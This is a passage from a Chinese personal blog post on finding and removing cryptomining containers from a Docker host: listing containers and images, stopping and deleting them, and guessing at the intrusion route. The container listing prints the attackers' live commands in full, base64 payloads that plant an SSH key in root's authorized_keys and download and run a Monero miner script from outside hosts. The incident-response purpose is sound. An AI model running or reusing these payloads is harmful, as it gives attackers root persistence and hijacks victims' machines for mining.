</span></span><span style="display:flex;"><span>b5d5a2638c3735cb18b4df540dd85ab17805f2086d4374c432ed7f9182f77c21   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKCmNoYXR0ciAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IHRudHJlY2h0IC1SIC1pYSAvcm9vdC8uc3NoLyAyPi9kZXYvbnVsbDsgaWNoZGFyZiAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGwKY2F0IC90bXAvVGVhbVROVC5wdWIgPj4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMKY2F0IC90bXAvVGVhbVROVC5wdWIgPiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5czIKcm0gLWYgL3RtcC9UZWFtVE5ULnB1YgoKCnNzaCAtb1N0cmljdEhvc3RLZXlDaGVja2luZz1ubyAtb0JhdGNoTW9kZT15ZXMgLW9Db25uZWN0VGltZW91dD01IC1pIC90bXAvVGVhbVROVCByb290QDEyNy4wLjAuMSAiKGN1cmwgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHxjZDEgaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNofHx3Z2V0IC1xIC1PLSBodHRwOi8vdGVhbXRudC5yZWQvc2gvc2V0dXAvbW9uZXJvb2NlYW5fbWluZXIuc2h8fHdkMSAtcSAtTy0gaHR0cDovL3RlYW10bnQucmVkL3NoL3NldHVwL21vbmVyb29jZWFuX21pbmVyLnNoKXxiYXNoIgoKcm0gLWYgL3RtcC9UZWFtVE5UCgo= | base64 -d | bash&#39;&#34;</span>   <span style="color:#099">4</span> days ago          Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">4</span> days ago                                                      flamboyant_liskov
</span></span><span style="display:flex;"><span>55f6154c77cf0239c0df0f15bdbe1a4b67db71f5a61f6ed55ca543af40a429d7   alpineos/dockerapi                                                        <span style="color:#d14">&#34;/pause&#34;</span>                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                <span style="color:#099">4</span> days ago          Up <span style="color:#099">4</span> days                                                                  clever_sammet
</span></span><span style="display:flex;"><span>fd3a4ea7e1d9eba40b2a1bb887fc85c798894b23b27f5cc306130cc22c6cf6db   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKbWtkaXIgLXAgL3Jvb3QvLnNzaApjaGF0dHIgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsOyB0bnRyZWNodCAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IGljaGRhcmYgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsCmNhdCAvdG1wL1RlYW1UTlQucHViID4+IC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCmNhdCAvdG1wL1RlYW1UTlQucHViID4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMyCnJtIC1mIC90bXAvVGVhbVROVC5wdWIKCgpzc2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRpbWVvdXQ9NSAtaSAvdG1wL1RlYW1UTlQgcm9vdEAxMjcuMC4wLjEgIihjdXJsIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8Y2QxIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8d2dldCAtcSAtTy0gaHR0cDovLzEwNC4xOTIuODIuMTM4L3MzZjEwMTUvYi9hLnNofHx3ZDEgLXEgLU8tIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaCl8YmFzaCIKCnJtIC1mIC90bXAvVGVhbVROVA==  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">2</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">2</span> weeks ago                                                     vigilant_lamport
</span></span><span style="display:flex;"><span>2079058fc554083300ef6277d1942404bf1318ec057d63a7af81504564e9f5d3   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKbWtkaXIgLXAgL3Jvb3QvLnNzaApjaGF0dHIgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsOyB0bnRyZWNodCAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IGljaGRhcmYgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsCmNhdCAvdG1wL1RlYW1UTlQucHViID4+IC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCmNhdCAvdG1wL1RlYW1UTlQucHViID4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMyCnJtIC1mIC90bXAvVGVhbVROVC5wdWIKCgpzc2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRpbWVvdXQ9NSAtaSAvdG1wL1RlYW1UTlQgcm9vdEAxMjcuMC4wLjEgIihjdXJsIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8Y2QxIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8d2dldCAtcSAtTy0gaHR0cDovLzEwNC4xOTIuODIuMTM4L3MzZjEwMTUvYi9hLnNofHx3ZDEgLXEgLU8tIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaCl8YmFzaCIKCnJtIC1mIC90bXAvVGVhbVROVA==  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">4</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">4</span> weeks ago                                                     funny_swirles
</span></span><span style="display:flex;"><span>b541f979ea7d8ff2ea4f0d2690ce02135174d6ee4995a80d1836d480aecc7c4b   alpine                                                                    <span style="color:#d14">&#34;chroot /host bash -c &#39;echo c3NoLWtleWdlbiAtTiAiIiAtZiAvdG1wL1RlYW1UTlQKbWtkaXIgLXAgL3Jvb3QvLnNzaApjaGF0dHIgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsOyB0bnRyZWNodCAtUiAtaWEgL3Jvb3QvLnNzaC8gMj4vZGV2L251bGw7IGljaGRhcmYgLVIgLWlhIC9yb290Ly5zc2gvIDI+L2Rldi9udWxsCmNhdCAvdG1wL1RlYW1UTlQucHViID4+IC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCmNhdCAvdG1wL1RlYW1UTlQucHViID4gL3Jvb3QvLnNzaC9hdXRob3JpemVkX2tleXMyCnJtIC1mIC90bXAvVGVhbVROVC5wdWIKCgpzc2ggLW9TdHJpY3RIb3N0S2V5Q2hlY2tpbmc9bm8gLW9CYXRjaE1vZGU9eWVzIC1vQ29ubmVjdFRpbWVvdXQ9NSAtaSAvdG1wL1RlYW1UTlQgcm9vdEAxMjcuMC4wLjEgIihjdXJsIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8Y2QxIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaHx8d2dldCAtcSAtTy0gaHR0cDovLzEwNC4xOTIuODIuMTM4L3MzZjEwMTUvYi9hLnNofHx3ZDEgLXEgLU8tIGh0dHA6Ly8xMDQuMTkyLjgyLjEzOC9zM2YxMDE1L2IvYS5zaCl8YmFzaCIKCnJtIC1mIC90bXAvVGVhbVROVA==  | base64 -d | bash&#39;&#34;</span>                                          <span style="color:#099">7</span> weeks ago         Exited <span style="color:#000;font-weight:bold">(</span>1<span style="color:#000;font-weight:bold">)</span> <span style="color:#099">7</span> weeks ago                                                     kind_leakey
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意">注意：</h4>
<p>一般根据完整的 command 可以看到挖矿病毒执行的脚本或者命令</p>
<h2 id="7查看镜像">7、查看镜像</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker images | grep alpine</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意-1">注意：</h4>
<p>一般情况下，挖矿的容器类型与该镜像添加的时间也接近，镜像类型也是一样的</p>
<h2 id="8停容器">8、停容器</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker stop c083afcd779c</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker stop d241358140a8</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h4 id="注意-2">注意：</h4>
<p>要找到守护进程和主体进程，清理干净</p>
<h2 id="9删容器">9、删容器</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">2
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rm c083afcd779c</span>
</span></span><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rm d241358140a8</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="10删镜像">10、删镜像</h2>
<div class="highlight"><div style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;">
<table style="border-spacing:0;padding:0;margin:0;border:0;"><tr><td style="vertical-align:top;padding:0;margin:0;border:0;">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code><span style="white-space:pre;user-select:none;margin-right:0.4em;padding:0 0.4em 0 0.4em;color:#7f7f7f">1
</span></code></pre></td>
<td style="vertical-align:top;padding:0;margin:0;border:0;;width:100%">
<pre tabindex="0" style="background-color:#fff;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-bash" data-lang="bash"><span style="display:flex;"><span><span style="color:#000;font-weight:bold">[</span>root@harbor ~<span style="color:#000;font-weight:bold">]</span><span style="color:#998;font-style:italic"># docker rmi b39e0b392b7e</span>
</span></span></code></pre></td></tr></table>
</div>
</div><h2 id="11入侵原因">11、入侵原因</h2>
<p>容器的入侵途径没 ECS 方便定位，等后续学会了再补充。。。<br>
不过清理容器挖矿比 ECS 还方便，查看了下 ECS 日志，只能看到部分 messages 里面存在日志，其他找不到蛛丝马迹了<br>
不过可以把测试服务器的开源软件版本搜集下，搜查下 CVE 库看看是否有漏洞，如果有漏洞的话可以升级下安全版本</p>
<h2 id="12参考">12、参考</h2>
<p>docker挖矿：<a href="https://blog.csdn.net/dot_life/article/details/105480202">https://blog.csdn.net/dot_life/article/details/105480202</a></p>

        </div>

        
<div class="post-archive">
    <ul class="post-copyright">
        <li><strong>原文作者：</strong><a rel="author" href="https://anttu.gitee.io/">Anttu</a></li>
        <li style="word-break:break-all"><strong>原文链接：</strong><a href="https://anttu.gitee.io/post/2022-01-26-miner_virus_4/">https://anttu.gitee.io/post/2022-01-26-miner_virus_4/</a></li>
        <li><strong>版权声明：</strong>本作品采用<a rel="license" href="https://creativecommons.org/licenses/by-nc-nd/4.0/">知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议</a>进行许可，非商业转载请注明出处（作者，原文链接），商业转载请联系作者获得授权。</li>
    </ul>
</div>
<br/>



        

<div class="post-archive">
    <h2>See Also</h2>
    <ul class="listing">
        
        <li><a href="/post/2022-01-24-miner_virus_3/">挖矿病毒3-分析和清理过程</a></li>
        
        <li><a href="/post/2022-01-07-regexp/">一些正则小细节-不定期补充</a></li>
        
        <li><a href="/post/2022-01-06-sdkman/">sdkman的使用</a></li>
        
        <li><a href="/post/2021-12-23-mysql_table_clean/">mysql大表的数据清理</a></li>
        
        <li><a href="/post/2021-12-17-nmap/">nmap参数详解</a></li>
        
    </ul>
</div>


        <div class="post-meta meta-tags">
            
            没有标签
            
        </div>
    </article>
    
    

    
    
    <div class="post bg-white">
      <script src="https://utteranc.es/client.js"
            repo= "anTtutu/anTtutu.github.io"
            issue-term="pathname"
            theme="github-light"
            crossorigin="anonymous"
            async>
      </script>
    </div>
    
    
    
</div>

                    <footer id="footer">
    <div>
        &copy; 2025 <a href="https://anttu.gitee.io/">Anttu&#39;s Blog By Anttu</a>
        
    </div>
    <br />
    <div>
        <div class="github-badge">
            <a href="https://gohugo.io/" target="_black" rel="nofollow"><span class="badge-subject">Powered by</span><span class="badge-value bg-blue">Hugo</span></a>
        </div>
        
        <div class="github-badge">
            <a href="https://github.com/flysnow-org/maupassant-hugo" target="_black"><span class="badge-subject">Theme</span><span class="badge-value bg-yellowgreen">Maupassant</span></a>
        </div>
    </div>
</footer>


    
    
    <script type="text/javascript">
        window.MathJax = {
            tex2jax: {
                inlineMath: [['$', '$']],
                processEscapes: true
                }
            };
    </script>
    <script src='//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-MML-AM_CHTML' async></script>

<a id="rocket" href="#top"></a>
<script type="text/javascript" src='/js/totop.js?v=0.0.0' async=""></script>
<style type="text/css">
div.highlight {
    position: relative;
    margin: 1em 0px;
}

.copy-code {
    display: none;
    position: absolute;
    top: 4px;
    right: 4px;
    color: rgba(255, 255, 255, 0.8);
    background: rgba(78, 78, 78, 0.8);
    border-radius: var(--radius);
    padding: 0 5px;
    font: inherit;
    user-select: none;
    cursor: pointer;
    border: 0;
    --radius: 8px;
}

div.highlight:hover .copy-code,pre:hover .copy-code {
    display: block;
}

</style>
<script>
    document.querySelectorAll('pre > code').forEach((codeblock) => {
        const container = codeblock.parentNode.parentNode;

        const copybutton = document.createElement('button');
        copybutton.classList.add('copy-code');
        copybutton.innerHTML = 'copy';

        function copyingDone() {
            copybutton.innerHTML = 'copied!';
            setTimeout(() => {
                copybutton.innerHTML = 'copy';
            }, 2000);
        }

        copybutton.addEventListener('click', (cb) => {
            if ('clipboard' in navigator) {
                navigator.clipboard.writeText(codeblock.textContent);
                copyingDone();
                return;
            }

            const range = document.createRange();
            range.selectNodeContents(codeblock);
            const selection = window.getSelection();
            selection.removeAllRanges();
            selection.addRange(range);
            try {
                document.execCommand('copy');
                copyingDone();
            } catch (e) { };
            selection.removeRange(range);
        });

        if (container.classList.contains("highlight")) {
            container.appendChild(copybutton);
        } else if (container.parentNode.firstChild == container) {
            
        } else if (codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.nodeName == "TABLE") {
            
            codeblock.parentNode.parentNode.parentNode.parentNode.parentNode.appendChild(copybutton);
        } else {
            
            codeblock.parentNode.appendChild(copybutton);
        }
    });
</script>


    <script type="text/javascript" src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>




    <script src='/js/asciinema-player.js'></script>

                </div>

                <div id="secondary">
    <section class="widget">
        <form id="search" action='https://anttu.gitee.io/search' method="get" accept-charset="utf-8" target="_blank" _lpchecked="1">
      
      <input type="text" name="q" maxlength="20" placeholder="Search">
      <input type="hidden" name="sitesearch" value="https://anttu.gitee.io/">
      <button type="submit" class="submit icon-search"></button>
</form>
    </section>
    
    <section class="widget">
        <h3 class="widget-title">最近文章</h3>
<ul class="widget-list">
    
    <li>
        <a href="https://anttu.gitee.io/post/2025-02-13-mvnd/" title="mvnd结合idea使用" target="_blank">mvnd结合idea使用</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2024-04-15-postgresql/" title="postgresql数据库常用记录" target="_blank">postgresql数据库常用记录</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2023-06-16-miner_virus_5/" title="挖矿病毒5-私有云机房挖矿病毒定位" target="_blank">挖矿病毒5-私有云机房挖矿病毒定位</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-12-26-covid-19/" title="羊了" target="_blank">羊了</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-12-19-git_delete_history/" title="git删除历史提交记录" target="_blank">git删除历史提交记录</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-11-28-python_muilt_version/" title="python多版本管理工具" target="_blank">python多版本管理工具</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-11-22-springboot_start_failed/" title="springboot常见兼容性错误" target="_blank">springboot常见兼容性错误</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-11-14-docker_port/" title="docker修改运行的容器端口" target="_blank">docker修改运行的容器端口</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-11-10-go_muilt_version/" title="go多版本管理工具" target="_blank">go多版本管理工具</a>
    </li>
    
    <li>
        <a href="https://anttu.gitee.io/post/2022-10-27-jenkins_reset/" title="jenkins的admin密码忘记了如何重置" target="_blank">jenkins的admin密码忘记了如何重置</a>
    </li>
    
</ul>
    </section>

    

    <section class="widget">
        <h3 class="widget-title"><a href='/categories/'>分类</a></h3>
<ul class="widget-list">
    
    <li><a href="https://anttu.gitee.io/categories/about/">about (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/android/">android (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/app/">app (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/aria2/">aria2 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/arm64/">arm64 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/arthas/">arthas (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/awr/">awr (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/backend_execute/">backend_execute (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/backup/">backup (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/blog/">blog (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/bug/">bug (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/build/">build (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/cache/">cache (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/caffeine/">caffeine (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/captcha/">captcha (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/check/">check (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/clean/">clean (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/cli/">cli (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/cluster/">cluster (4)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/covid-19/">covid-19 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/cve/">cve (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/cygwin/">cygwin (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/dataguard/">dataguard (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/db/">db (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/deepfacelab/">deepfacelab (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/devops/">devops (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/docker/">docker (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/dockerfile/">dockerfile (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/dos/">dos (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/dump/">dump (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/eclipse/">eclipse (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/explain/">explain (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/faker/">faker (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/gcc/">gcc (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/git/">git (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/gitment/">gitment (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/gitpages/">gitpages (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/go/">go (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/h2/">h2 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/h5/">h5 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/ha/">ha (4)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/http/">http (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/hugo/">hugo (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/id/">id (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/idea/">idea (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/java/">java (24)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/jekyll/">jekyll (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/jenkins/">jenkins (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/jrebel/">jrebel (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/js/">js (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/jsr/">jsr (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/jvm/">jvm (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/kafka/">kafka (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/kali/">kali (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/kenlm/">kenlm (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/linux/">linux (22)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/log/">log (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/log4j/">log4j (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/lombok/">lombok (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/mac/">mac (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/matplotlib/">matplotlib (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/maven/">maven (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/mine/">mine (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/mongodb/">mongodb (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/mvnd/">mvnd (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/mysql/">mysql (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/nginx/">nginx (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/nmap/">nmap (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/oom/">oom (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/oracle/">oracle (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/orangePi/">orangePi (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/package/">package (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/pandas/">pandas (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/pg/">pg (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/port/">port (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/postgresql/">postgresql (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/python/">python (8)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/rec/">rec (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/redis/">redis (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/regexp/">regexp (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/safe/">safe (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/sdk/">sdk (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/shell/">shell (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/split/">split (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/springboot/">springboot (4)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/springcloud/">springcloud (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/sqlmap/">sqlmap (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/ssd/">ssd (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/tcp/">tcp (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/termux/">termux (2)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/test/">test (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/testing/">testing (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/union_id/">union_id (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/vcs/">vcs (7)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/virus/">virus (5)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/vxvm/">vxvm (3)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/win10/">win10 (6)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/xrebel/">xrebel (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/ynote/">ynote (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/zk/">zk (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/zookeeper/">zookeeper (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/%E5%89%8D%E7%AB%AF/">前端 (1)</a></li>
    
    <li><a href="https://anttu.gitee.io/categories/%E5%AE%B9%E7%81%BE/">容灾 (1)</a></li>
    
</ul>
    </section>

    <section class="widget">
        <h3 class="widget-title"><a href='/tags/'>标签</a></h3>
<div class="tagcloud">
    
    <a href="https://anttu.gitee.io/tags/about/">about</a>
    
    <a href="https://anttu.gitee.io/tags/android/">android</a>
    
    <a href="https://anttu.gitee.io/tags/app/">app</a>
    
    <a href="https://anttu.gitee.io/tags/aria2/">aria2</a>
    
    <a href="https://anttu.gitee.io/tags/arm64/">arm64</a>
    
    <a href="https://anttu.gitee.io/tags/awr/">awr</a>
    
    <a href="https://anttu.gitee.io/tags/backup/">backup</a>
    
    <a href="https://anttu.gitee.io/tags/blog/">blog</a>
    
    <a href="https://anttu.gitee.io/tags/bug/">bug</a>
    
    <a href="https://anttu.gitee.io/tags/build/">build</a>
    
    <a href="https://anttu.gitee.io/tags/captcha/">captcha</a>
    
    <a href="https://anttu.gitee.io/tags/check/">check</a>
    
    <a href="https://anttu.gitee.io/tags/cluster/">cluster</a>
    
    <a href="https://anttu.gitee.io/tags/cygwin/">cygwin</a>
    
    <a href="https://anttu.gitee.io/tags/dataguard/">dataguard</a>
    
    <a href="https://anttu.gitee.io/tags/deepfacelab/">deepfacelab</a>
    
    <a href="https://anttu.gitee.io/tags/dos/">dos</a>
    
    <a href="https://anttu.gitee.io/tags/eclipse/">eclipse</a>
    
    <a href="https://anttu.gitee.io/tags/explain/">explain</a>
    
    <a href="https://anttu.gitee.io/tags/gcc/">gcc</a>
    
    <a href="https://anttu.gitee.io/tags/gitment/">gitment</a>
    
    <a href="https://anttu.gitee.io/tags/gitpages/">gitpages</a>
    
    <a href="https://anttu.gitee.io/tags/go/">go</a>
    
